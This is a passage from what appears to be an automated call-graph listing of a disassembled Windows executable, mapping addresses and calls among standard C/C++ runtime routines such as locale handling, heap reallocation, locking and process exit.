calls 19651->19654 19653 99ad27 ___free_lconv_mon 14 API calls 19652->19653 19653->19633 19655 9a223b 19654->19655 19656 9a2242 19655->19656 19657 9a22b3 19655->19657 19685 9a952c 19656->19685 19658 9972c9 __Getctype 11 API calls 19657->19658 19660 9a22bd 19658->19660 19662 9a2288 19664 99ad27 ___free_lconv_mon 14 API calls 19662->19664 19663 9a2269 19665 996bb1 __Wcrtomb 14 API calls 19663->19665 19664->19640 19666 9a226e 19665->19666 19667 99ad27 ___free_lconv_mon 14 API calls 19666->19667 19667->19633 19669 9a22cb 19668->19669 19670 9a20ad 19668->19670 19700 9a232d 19669->19700 19670->19618 19670->19620 19670->19647 19673 9a22ee 19672->19673 19675 9a214b 19672->19675 19673->19675 19715 9a943b 19673->19715 19675->19625 19675->19632 19677 9a169b 19676->19677 19678 9a1680 19676->19678 19680 9a16aa 19677->19680 19815 9a83c4 19677->19815 19678->19677 19679 9a168c 19678->19679 19681 996bb1 __Wcrtomb 14 API calls 19679->19681 19822 9a4976 19680->19822 19684 9a1691 std::invalid_argument::invalid_argument 19681->19684 19684->19646 19834 99c0a1 19685->19834 19689 9a959f 19691 9a95ab 19689->19691 19693 99ad27 ___free_lconv_mon 14 API calls 19689->19693 19694 9a2263 19691->19694 19696 99ad27 ___free_lconv_mon 14 API calls 19691->19696 19692 99c0a1 39 API calls 19695 9a957c 19692->19695 19693->19691 19694->19662 19694->19663 19697 991524 17 API calls 19695->19697 19696->19694 19698 9a9589 19697->19698 19698->19689 19699 9a9593 SetEnvironmentVariableW 19698->19699 19699->19689 19701 9a233b 19700->19701 19702 9a2340 19700->19702 19701->19670 19703 99c0e0 __Getctype 14 API calls 19702->19703 19704 9a235d 19703->19704 19705 9a23cb 19704->19705 19708 9a23d0 19704->19708 19711 99c0e0 __Getctype 14 API calls 19704->19711 19712 99ad27 ___free_lconv_mon 14 API calls 19704->19712 19713 99a99c ___std_exception_copy 29 API calls 19704->19713 19714 9a23ba 19704->19714 19706 997806 CallUnexpected 39 API calls 19705->19706 19706->19708 19707 99ad27 ___free_lconv_mon 14 API calls 19707->19701 19709 9972c9 __Getctype 11 API calls 19708->19709 19710 9a23dc 19709->19710 19711->19704 19712->19704 19713->19704 19714->19707 19716 9a9449 19715->19716 19717 9a944f 19715->19717 19720 9aa08b 19716->19720 19723 9aa043 19716->19723 19733 9a9464 19717->19733 19753 9aa0a1 19720->19753 19722 9aa049 19725 996bb1 __Wcrtomb 14 API calls 19722->19725 19723->19722 19726 9aa066 19723->19726 19724 9aa059 19724->19673 19727 9aa04e 19725->19727 19729 996bb1 __Wcrtomb 14 API calls 19726->19729 19732 9aa084 19726->19732 19728 99729c __strnicoll 29 API calls 19727->19728 19728->19724 19730 9aa075 19729->19730 19731 99729c __strnicoll 29 API calls 19730->19731 19731->19724 19732->19673 19734 99142a __strnicoll 39 API calls 19733->19734 19735 9a947a 19734->19735 19736 9a9496 19735->19736 19737 9a945f 19735->19737 19738 9a94ad 19735->19738 19739 996bb1 __Wcrtomb 14 API calls 19736->19739 19737->19673 19741 9a94c8 19738->19741 19742 9a94b6 19738->19742 19740 9a949b 19739->19740 19746 99729c __strnicoll 29 API calls 19740->19746 19744 9a94e8 19741->19744 19745 9a94d5 19741->19745 19743 996bb1 __Wcrtomb 14 API calls 19742->19743 19747 9a94bb 19743->19747 19771 9aa16c 19744->19771 19748 9aa0a1 __strnicoll 39 API calls 19745->19748 19746->19737 19750 99729c __strnicoll 29 API calls 19747->19750 19748->19737 19750->19737 19752 996bb1 __Wcrtomb 14 API calls 19752->19737 19754 9aa0cb 19753->19754 19755 9aa0b1 19753->19755 19756 9aa0ea 19754->19756 19757 9aa0d3 19754->19757 19758 996bb1 __Wcrtomb 14 API calls 19755->19758 19760 9aa10d 19756->19760 19761 9aa0f6 19756->19761 19759 996bb1 __Wcrtomb 14 API calls 19757->19759 19762 9aa0b6 19758->19762 19763 9aa0d8 19759->19763 19766 99142a __strnicoll 39 API calls 19760->19766 19769 9aa0c1 19760->19769 19764 996bb1 __Wcrtomb 14 API calls 19761->19764 19765 99729c __strnicoll 29 API calls 19762->19765 19767 99729c __strnicoll 29 API calls 19763->19767 19768 9aa0fb 19764->19768 19765->19769 19766->19769 19767->19769 19770 99729c __strnicoll 29 API calls 19768->19770 19769->19724 19770->19769 19772 99142a __strnicoll 39 API calls 19771->19772 19773 9aa17f 19772->19773 19776 9aa1b2 19773->19776 19778 9aa1e6 __strnicoll 19776->19778 19777 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19779 9a94fe 19777->19779 19780 9aa266 19778->19780 19781 9aa44a 19778->19781 19783 9aa253 GetCPInfo 19778->19783 19788 9aa26a 19778->19788 19779->19737 19779->19752 19782 99adaf __strnicoll MultiByteToWideChar 19780->19782 19780->19788 19784 9aa2ec 19782->19784 19783->19780 19783->19788 19785 9aa43e 19784->19785 19787 99ad61 __strnicoll 15 API calls 19784->19787 19784->19788 19789 9aa313 __alloca_probe_16 19784->19789 19786 98ea27 __freea 14 API calls 19785->19786 19786->19788 19787->19789 19788->19777 19788->19781 19789->19785 19790 99adaf __strnicoll MultiByteToWideChar 19789->19790 19791 9aa35f 19790->19791 19791->19785 19792 99adaf __strnicoll MultiByteToWideChar 19791->19792 19793 9aa37b 19792->19793 19793->19785 19794 9aa389 19793->19794 19795 9aa3ec 19794->19795 19797 99ad61 __strnicoll 15 API calls 19794->19797 19800 9aa3a2 __alloca_probe_16 19794->19800 19796 98ea27 __freea 14 API calls 19795->19796 19798 9aa3f2 19796->19798 19797->19800 19799 98ea27 __freea 14 API calls 19798->19799 19799->19788 19800->19795 19801 99adaf __strnicoll MultiByteToWideChar 19800->19801 19802 9aa3e5 19801->19802 19802->19795 19803 9aa40e 19802->19803 19809 99b89c 19803->19809 19806 98ea27 __freea 14 API calls 19810 99beac std::_Lockit::_Lockit 5 API calls 19809->19810 19811 99b8a7 19810->19811 19812 99bbe6 __strnicoll 5 API calls 19811->19812 19814 99b8ad 19811->19814 19813 99b8ed CompareStringW 19812->19813 19813->19814 19814->19806 19816 9a83cf 19815->19816 19817 9a83e4 HeapSize 19815->19817 19818 996bb1 __Wcrtomb 14 API calls 19816->19818 19817->19680 19819 9a83d4 19818->19819 19820 99729c __strnicoll 29 API calls 19819->19820 19821 9a83df 19820->19821 19821->19680 19823 9a498e 19822->19823 19824 9a4983 19822->19824 19825 9a4996 19823->19825 19832 9a499f __Getctype 19823->19832 19826 99ad61 __strnicoll 15 API calls 19824->19826 19827 99ad27 ___free_lconv_mon 14 API calls 19825->19827 19830 9a498b 19826->19830 19827->19830 19828 9a49c9 HeapReAlloc 19828->19830 19828->19832 19829 9a49a4 19831 996bb1 __Wcrtomb 14 API calls 19829->19831 19830->19684 19831->19830 19832->19828 19832->19829 19833 994d3c std::ios_base::_Init 2 API calls 19832->19833 19833->19832 19835 99142a __strnicoll 39 API calls 19834->19835 19836 99c0b3 19835->19836 19837 99c0c5 19836->19837 19842 99b87d 19836->19842 19839 991524 19837->19839 19848 99157c 19839->19848 19845 99be92 19842->19845 19846 99be0d std::_Lockit::_Lockit 5 API calls 19845->19846 19847 99b885 19846->19847 19847->19837 19849 99158a 19848->19849 19850 9915a4 19848->19850 19866 99150a 19849->19866 19852 9915ab 19850->19852 19853 9915ca 19850->19853 19865 99153c 19852->19865 19870 9914cb 19852->19870 19854 99adaf __strnicoll MultiByteToWideChar 19853->19854 19859 9915d9 19854->19859 19856 9915e0 GetLastError 19875 996bd7 19856->19875 19858 991606 19862 99adaf __strnicoll MultiByteToWideChar 19858->19862 19858->19865 19859->19856 19859->19858 19861 9914cb 15 API calls 19859->19861 19861->19858 19864 99161d 19862->19864 19863 996bb1 __Wcrtomb 14 API calls 19863->19865 19864->19856 19864->19865 19865->19689 19865->19692 19867 99151d 19866->19867 19868 991515 19866->19868 19867->19865 19869 99ad27 ___free_lconv_mon 14 API calls 19868->19869 19869->19867 19871 99150a 14 API calls 19870->19871 19872 9914d9 19871->19872 19880 9914ac 19872->19880 19883 996bc4 19875->19883 19877 996be2 __dosmaperr 19878 996bb1 __Wcrtomb 14 API calls 19877->19878 19879 9915ec 19878->19879 19879->19863 19881 99ad61 __strnicoll 15 API calls 19880->19881 19882 9914b9 19881->19882 19882->19865 19884 99b104 __dosmaperr 14 API calls 19883->19884 19885 996bc9 19884->19885 19885->19877 19938 9841c0 19886->19938 19888 98286b 19898 98287f 19888->19898 19942 986e00 19888->19942 19893 9829bd 19894 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19893->19894 19895 981c45 19894->19895 19899 9824c0 19895->19899 19896 9828ad std::ios_base::_Ios_base_dtor 19961 986f10 19896->19961 19966 9845c0 19898->19966 19901 9824f0 19899->19901 19900 9841c0 39 API calls 19912 9825a0 19900->19912 19901->19900 19902 9845c0 39 API calls 19903 982803 19902->19903 19904 984610 39 API calls 19903->19904 19906 982816 19904->19906 19905 9825b4 19905->19902 19908 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19906->19908 19907 98266d 19914 9826d2 19907->19914 20939 98b4c0 19907->20939 19910 981c5c 19908->19910 19915 9822d0 19910->19915 19911 984480 70 API calls 19911->19912 19912->19905 19912->19907 19912->19911 19913 984480 70 API calls 19913->19914 19914->19905 19914->19913 20950 9822f0 19915->20950 19939 9841e0 19938->19939 19941 9841fd 19939->19941 19974 9846e0 19939->19974 19941->19888 19984 98bd52 19942->19984 19946 986e3a 19960 986e65 19946->19960 20005 986ff0 19946->20005 19949 986ef0 19951 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19949->19951 19952 986efa 19951->19952 19952->19896 19953 986e90 20019 9849e0 19953->20019 19998 98bd83 19960->19998 20280 987520 19961->20280 19967 9845e5 19966->19967 20795 985920 19967->20795 19970 984610 19972 984624 19970->19972 19971 98463f 19971->19893 19972->19971 20935 986b10 19972->20935 19975 984708 19974->19975 19976 984789 19975->19976 19978 9841c0 39 API calls 19975->19978 19977 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19976->19977 19979 984793 19977->19979 19980 984723 19978->19980 19979->19941 19982 9845c0 39 API calls 19980->19982 19983 984736 19980->19983 19981 984610 39 API calls 19981->19976 19982->19983 19983->19981 19985 98bd68 19984->19985 19986 98bd61 19984->19986 19988 986e24 19985->19988 20037 98e608 EnterCriticalSection 19985->20037 20032 9975c2 19986->20032 19990 9847e0 19988->19990 19991 98483e 19990->19991 19992 984802 19990->19992 19993 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 19991->19993 19994 98bd52 std::_Lockit::_Lockit 7 API calls 19992->19994 19995 984850 19993->19995 19996 984813 19994->19996 19995->19946 19997 98bd83 std::_Lockit::~_Lockit 2 API calls 19996->19997 19997->19991 19999 9975d0 19998->19999 20002 98bd8d 19998->20002 20087 9975ab LeaveCriticalSection 19999->20087 20001 98bda0 20001->19949 20002->20001 20086 98e616 LeaveCriticalSection 20002->20086 20003 9975d7 20003->19949 20006 98706c 20005->20006 20007 987010 20005->20007 20008 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20006->20008 20007->20006 20088 98b9cb 20007->20088 20009 986e82 20008->20009 20009->19953 20015 9849b0 20009->20015 20011 987028 20099 984b10 20011->20099 20016 9849c8 20015->20016 20017 98f0bd Concurrency::cancel_current_task RaiseException 20016->20017 20018 9849dd 20017->20018 20020 984a10 20019->20020 20021 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20020->20021 20022 984a1d 20021->20022 20023 98bdf6 20022->20023 20024 98be01 _Yarn 20023->20024 20025 986eb2 20024->20025 20276 98c31d 20024->20276 20028 984a30 20025->20028 20029 984a5c 20028->20029 20030 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20029->20030 20031 984a69 20030->20031 20031->19960 20038 99bd0b 20032->20038 20037->19988 20039 99be92 std::_Lockit::_Lockit 5 API calls 20038->20039 20040 99bd10 20039->20040 20059 99beac 20040->20059 20058 99bd3d 20058->20058 20060 99be0d std::_Lockit::_Lockit 5 API calls 20059->20060 20061 99bd15 20060->20061 20062 99bec6 20061->20062 20063 99be0d std::_Lockit::_Lockit 5 API calls 20062->20063 20064 99bd1a 20063->20064 20065 99bee0 20064->20065 20066 99be0d std::_Lockit::_Lockit 5 API calls 20065->20066 20067 99bd1f 20066->20067 20068 99befa 20067->20068 20069 99be0d std::_Lockit::_Lockit 5 API calls 20068->20069 20070 99bd24 20069->20070 20071 99bf14 20070->20071 20072 99be0d std::_Lockit::_Lockit 5 API calls 20071->20072 20073 99bd29 20072->20073 20074 99bf2e 20073->20074 20075 99be0d std::_Lockit::_Lockit 5 API calls 20074->20075 20076 99bd2e 20075->20076 20077 99bf48 20076->20077 20078 99be0d std::_Lockit::_Lockit 5 API calls 20077->20078 20079 99bd33 20078->20079 20080 99bf62 20079->20080 20081 99be0d std::_Lockit::_Lockit 5 API calls 20080->20081 20082 99bd38 20081->20082 20083 99bf7c 20082->20083 20084 99be0d std::_Lockit::_Lockit 5 API calls 20083->20084 20085 99bf92 20084->20085 20085->20058 20086->20001 20087->20003 20090 98b9d0 _Yarn 20088->20090 20089 98b9ea 20089->20011 20090->20089 20091 994d3c std::ios_base::_Init 2 API calls 20090->20091 20092 98b9ec 20090->20092 20091->20090 20093 98de77 std::ios_base::_Init 20092->20093 20094 98b9f6 Concurrency::cancel_current_task 20092->20094 20095 98f0bd Concurrency::cancel_current_task RaiseException 20093->20095 20125 98f0bd 20094->20125 20097 98de93 20095->20097 20098 98c339 20100 98bd52 std::_Lockit::_Lockit 7 API calls 20099->20100 20101 984b30 20100->20101 20102 984b9b 20101->20102 20103 984b7f 20101->20103 20137 98c37a 20102->20137 20128 98be78 20103->20128 20126 98f105 RaiseException 20125->20126 20127 98f0d7 20125->20127 20126->20098 20127->20126 20144 9987a0 20128->20144 20246 98c467 20137->20246 20140 98f0bd Concurrency::cancel_current_task RaiseException 20141 98c399 20140->20141 20249 9836c0 20141->20249 20145 99bd0b std::_Lockit::_Lockit 5 API calls 20144->20145 20146 9987ad 20145->20146 20153 9989d2 20146->20153 20149 98bede 20154 9989de ___scrt_is_nonwritable_in_current_image 20153->20154 20161 997594 EnterCriticalSection 20154->20161 20156 9989ec 20162 998873 20156->20162 20158 9989f9 20190 998a21 20158->20190 20161->20156 20193 9987d8 20162->20193 20164 99888e 20165 99afb3 __Getctype 39 API calls 20164->20165 20188 9988d9 20164->20188 20166 99889b 20165->20166 20240 9a4cbf 20166->20240 20188->20158 20245 9975ab LeaveCriticalSection 20190->20245 20192 98be85 20192->20149 20194 9987f2 20193->20194 20195 9987e4 20193->20195 20197 9a49df std::_Locinfo::_Locinfo_dtor 41 API calls 20194->20197 20196 994e9b std::_Locinfo::_Locinfo_dtor 60 API calls 20195->20196 20198 9987ee 20196->20198 20199 998809 20197->20199 20198->20164 20200 998868 20199->20200 20201 99c0e0 __Getctype 14 API calls 20199->20201 20202 9972c9 __Getctype 11 API calls 20200->20202 20203 998824 20201->20203 20204 998872 20202->20204 20205 99884c 20203->20205 20207 9a49df std::_Locinfo::_Locinfo_dtor 41 API calls 20203->20207 20208 9987d8 std::_Locinfo::_Locinfo_dtor 64 API calls 20204->20208 20206 99ad27 ___free_lconv_mon 14 API calls 20205->20206 20209 998861 20206->20209 20210 99883b 20207->20210 20211 99888e 20208->20211 20209->20164 20212 99884e 20210->20212 20213 998842 20210->20213 20215 99afb3 __Getctype 39 API calls 20211->20215 20238 9988d9 20211->20238 20214 994e9b std::_Locinfo::_Locinfo_dtor 60 API calls 20212->20214 20213->20200 20213->20205 20214->20205 20238->20164 20241 9a4cd3 _Fputc 20240->20241 20242 9a4fa4 std::_Locinfo::_Locinfo_dtor 41 API calls 20241->20242 20245->20192 20253 986a70 20246->20253 20250 9836f7 std::invalid_argument::invalid_argument 20249->20250 20251 98f69a ___std_exception_copy 29 API calls 20250->20251 20252 98370f 20251->20252 20254 986ab1 std::invalid_argument::invalid_argument 20253->20254 20259 98f69a 20254->20259 20257 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20258 986ada 20257->20258 20258->20140 20260 98f6a7 _Yarn 20259->20260 20264 986ad0 20259->20264 20261 98f6d4 20260->20261 20263 99a99c ___std_exception_copy 29 API calls 20260->20263 20260->20264 20262 99831e _Yarn 14 API calls 20261->20262 20262->20264 20263->20261 20264->20257 20277 98c32b Concurrency::cancel_current_task 20276->20277 20278 98f0bd Concurrency::cancel_current_task RaiseException 20277->20278 20279 98c339 20278->20279 20295 98a120 20280->20295 20282 987582 20283 987693 20282->20283 20347 998339 20282->20347 20301 98a2a0 20283->20301 20286 9876e1 20296 98a146 std::_Throw_Cpp_error 20295->20296 20358 98ace0 20296->20358 20299 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20300 98a15b 20299->20300 20300->20282 20302 98a2ba 20301->20302 20303 98a2c9 20302->20303 20304 98a2df 20302->20304 20362 98ad50 20303->20362 20366 98ada0 20304->20366 20307 98a2d7 20307->20286 20348 998348 20347->20348 20349 99835f __floor_pentium4 20347->20349 20350 996bb1 __Wcrtomb 14 API calls 20348->20350 20353 998358 __startOneArgErrorHandling __floor_pentium4 20349->20353 20759 9a3f89 20349->20759 20351 99834d 20350->20351 20352 99729c __strnicoll 29 API calls 20351->20352 20352->20353 20353->20283 20359 98ad0a std::_Throw_Cpp_error 20358->20359 20360 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20359->20360 20361 98a151 20360->20361 20361->20299 20363 98ad78 std::_Throw_Cpp_error 20362->20363 20364 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20363->20364 20365 98ad96 20364->20365 20365->20307 20367 98ae34 20366->20367 20370 98add8 std::_Throw_Cpp_error 20366->20370 20372 98aec0 20367->20372 20369 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20371 98ae72 20369->20371 20370->20369 20371->20307 20390 9831c0 20372->20390 20391 9831db std::_Throw_Cpp_error 20390->20391 20392 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20391->20392 20393 983236 20392->20393 20760 9a3fc2 __startOneArgErrorHandling 20759->20760 20762 9a3fe9 __startOneArgErrorHandling __floor_pentium4 20760->20762 20770 9a43ff 20760->20770 20763 9a402c 20762->20763 20764 9a4007 20762->20764 20782 9a408b 20763->20782 20774 9a435f 20764->20774 20767 9a4027 __floor_pentium4 20771 9a442a __raise_exc 20770->20771 20772 9a4623 RaiseException 20771->20772 20773 9a463b 20772->20773 20773->20762 20775 9a436c 20774->20775 20776 9a437b __floor_pentium4 20775->20776 20777 9a43aa __startOneArgErrorHandling __floor_pentium4 20775->20777 20778 9a408b __startOneArgErrorHandling 14 API calls 20776->20778 20780 9a43f8 20777->20780 20781 9a408b __startOneArgErrorHandling 14 API calls 20777->20781 20780->20767 20781->20780 20783 9a4098 20782->20783 20784 9a40af 20782->20784 20786 9a40b4 20783->20786 20787 996bb1 __Wcrtomb 14 API calls 20783->20787 20785 996bb1 __Wcrtomb 14 API calls 20784->20785 20785->20786 20786->20767 20788 9a40a7 20787->20788 20788->20767 20798 985970 20795->20798 20799 985a5c 20798->20799 20800 9859b4 20798->20800 20801 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20799->20801 20803 98f0bd Concurrency::cancel_current_task RaiseException 20800->20803 20805 9859d4 20800->20805 20802 9829b1 20801->20802 20802->19970 20803->20805 20810 985a70 20805->20810 20806 985a2f 20813 985ab0 20806->20813 20818 985c50 20810->20818 20812 985a87 std::ios_base::_Init 20812->20806 20845 986000 20813->20845 20821 985c90 20818->20821 20822 985c58 20821->20822 20823 985cb7 20821->20823 20822->20812 20829 98ba4d AcquireSRWLockExclusive 20823->20829 20825 985cc5 20825->20822 20834 98bb02 20825->20834 20833 98ba61 20829->20833 20831 98ba66 ReleaseSRWLockExclusive 20831->20825 20833->20831 20838 98baed SleepConditionVariableSRW 20833->20838 20839 98bb17 20834->20839 20837 98ba9c AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 20837->20822 20838->20833 20840 98bb2d 20839->20840 20841 98bb26 20839->20841 20843 996888 std::ios_base::_Init 32 API calls 20840->20843 20842 9968f9 std::ios_base::_Init 32 API calls 20841->20842 20844 985ce0 20842->20844 20843->20844 20844->20837 20854 981d50 20845->20854 20855 981d79 std::_Throw_Cpp_error 20854->20855 20871 982fa0 20855->20871 20858 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20859 981dae 20858->20859 20860 9860e0 20859->20860 20884 986290 20860->20884 20872 9831c0 std::_Throw_Cpp_error 5 API calls 20871->20872 20873 982fcd 20872->20873 20874 983240 std::_Throw_Cpp_error 30 API calls 20873->20874 20875 982fdf std::_Throw_Cpp_error 20873->20875 20874->20875 20876 9831c0 std::_Throw_Cpp_error 5 API calls 20875->20876 20883 983018 std::_Throw_Cpp_error 20875->20883 20877 983072 20876->20877 20878 9832c0 std::_Throw_Cpp_error 5 API calls 20877->20878 20879 983089 20878->20879 20880 983360 std::_Throw_Cpp_error 30 API calls 20879->20880 20880->20883 20881 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20882 981da1 20881->20882 20882->20858 20883->20881 20885 9862b4 std::_Throw_Cpp_error 20884->20885 20908 986910 20885->20908 20888 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20889 986129 20888->20889 20909 9831c0 std::_Throw_Cpp_error 5 API calls 20908->20909 20910 98693d 20909->20910 20911 983240 std::_Throw_Cpp_error 30 API calls 20910->20911 20912 98694f std::_Throw_Cpp_error 20910->20912 20911->20912 20913 986988 std::_Throw_Cpp_error 20912->20913 20914 9831c0 std::_Throw_Cpp_error 5 API calls 20912->20914 20919 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20913->20919 20915 9869ca 20914->20915 20916 9832c0 std::_Throw_Cpp_error 5 API calls 20915->20916 20917 9869e1 20916->20917 20918 983360 std::_Throw_Cpp_error 30 API calls 20917->20918 20918->20913 20920 986302 20919->20920 20920->20888 20936 986b2e 20935->20936 20937 9845c0 39 API calls 20936->20937 20938 986b36 20936->20938 20937->20938 20938->19971 20942 98d1e3 20939->20942 20945 98cbe8 20942->20945 20946 98b501 20945->20946 20947 98cc0e codecvt 20945->20947 20946->19914 20947->20946 20948 98ce13 70 API calls 20947->20948 20949 98cdf5 70 API calls 20947->20949 20948->20947 20949->20947 20957 986cf0 20950->20957 20958 986d14 20957->20958 20959 984290 67 API calls 20958->20959 20960 986d22 std::ios_base::_Ios_base_dtor 20959->20960 20961 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20960->20961 20962 982318 20961->20962 20963 986bf0 20962->20963 20964 9841c0 39 API calls 20963->20964 20965 986c1f 20964->20965 20967 984480 70 API calls 20965->20967 20972 986c32 20965->20972 20966 9845c0 39 API calls 20968 986cc2 20966->20968 20967->20972 20972->20966 21212 994b82 21211->21212 21213 994b94 21211->21213 21215 98e3d9 _unexpected GetModuleHandleW 21212->21215 21223 994cef 21213->21223 21216 994b87 21215->21216 21216->21213 21238 994a89 GetModuleHandleExW 21216->21238 21218 98ef49 21218->18891 21224 994cfb ___scrt_is_nonwritable_in_current_image 21223->21224 21244 997594 EnterCriticalSection 21224->21244 21226 994d05 21245 994bec 21226->21245 21228 994d12 21249 994d30 21228->21249 21231 994b24 21274 994b0b 21231->21274 21233 994b2e 21234 994b42 21233->21234 21235 994b32 GetCurrentProcess TerminateProcess 21233->21235 21236 994a89 _unexpected 3 API calls 21234->21236 21235->21234 21237 994b4a ExitProcess 21236->21237 21239 994ae9 21238->21239 21240 994ac8 GetProcAddress 21238->21240 21242 994af8 21239->21242 21243 994aef FreeLibrary 21239->21243 21240->21239 21241 994adc 21240->21241 21241->21239 21242->21213 21243->21242 21244->21226 21248 994bf8 ___scrt_is_nonwritable_in_current_image _unexpected 21245->21248 21246 994c5c _unexpected 21246->21228 21248->21246 21252 9968bb 21248->21252 21273 9975ab LeaveCriticalSection 21249->21273 21251 994bcb 21251->21218 21251->21231 21253 9968c7 __EH_prolog3 21252->21253 21256 996b46 21253->21256 21255 9968ee std::ios_base::_Init 21255->21246 21257 996b52 ___scrt_is_nonwritable_in_current_image 21256->21257 21264 997594 EnterCriticalSection 21257->21264 21259 996b60 21265 996a11 21259->21265 21264->21259 21266 996a30 21265->21266 21267 996a28 21265->21267 21266->21267 21268 99ad27 ___free_lconv_mon 14 API calls 21266->21268 21269 996b95 21267->21269 21268->21267 21272 9975ab LeaveCriticalSection 21269->21272 21271 996b7e 21271->21255 21272->21271 21273->21251 21277 99e545 21274->21277 21276 994b10 _unexpected 21276->21233 21278 99e554 _unexpected 21277->21278 21279 99e561 21278->21279 21281 99bc80 21278->21281 21279->21276 21282 99be0d std::_Lockit::_Lockit 5 API calls 21281->21282 21283 99bc9c 21282->21283 21283->21279 22144 99ccc5 22147 9975ab LeaveCriticalSection 22144->22147 22146 99cccc 22147->22146 23506 98d1f8 23507 98d20c 23506->23507 23508 98d431 69 API calls 23507->23508 23513 98d267 23507->23513 23509 98d237 23508->23509 23510 98d254 23509->23510 23511 996c61 67 API calls 23509->23511 23509->23513 23510->23513 23514 997e7d 23510->23514 23511->23510 23515 997e88 23514->23515 23516 997e9d 23514->23516 23519 996bb1 __Wcrtomb 14 API calls 23515->23519 23517 997eba 23516->23517 23518 997ea5 23516->23518 23528 9a1944 23517->23528 23521 996bb1 __Wcrtomb 14 API calls 23518->23521 23520 997e8d 23519->23520 23523 99729c __strnicoll 29 API calls 23520->23523 23524 997eaa 23521->23524 23526 997e98 23523->23526 23527 99729c __strnicoll 29 API calls 23524->23527 23525 997eb5 23525->23513 23526->23513 23527->23525 23529 9a1958 _Fputc 23528->23529 23532 9a1eed 23529->23532 23531 9a1964 _Fputc 23531->23525 23533 9a1ef9 ___scrt_is_nonwritable_in_current_image 23532->23533 23534 9a1f23 23533->23534 23535 9a1f00 23533->23535 23543 991d4e EnterCriticalSection 23534->23543 23536 997445 _Fputc 29 API calls 23535->23536 23540 9a1f19 23536->23540 23538 9a1f31 23544 9a1d4c 23538->23544 23540->23531 23541 9a1f40 23557 9a1f72 23541->23557 23543->23538 23545 9a1d5b 23544->23545 23546 9a1d83 23544->23546 23547 997445 _Fputc 29 API calls 23545->23547 23548 99e509 _Ungetc 29 API calls 23546->23548 23549 9a1d76 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23547->23549 23550 9a1d8c 23548->23550 23549->23541 23551 9a177e 33 API calls 23550->23551 23552 9a1daa 23551->23552 23552->23549 23553 9a1e36 23552->23553 23554 9a1e4d 23552->23554 23555 9a19d6 34 API calls 23553->23555 23554->23549 23556 9a1b81 33 API calls 23554->23556 23555->23549 23556->23549 23560 991d62 LeaveCriticalSection 23557->23560 23559 9a1f7a 23559->23540 23560->23559 23634 99c717 23635 99c72c 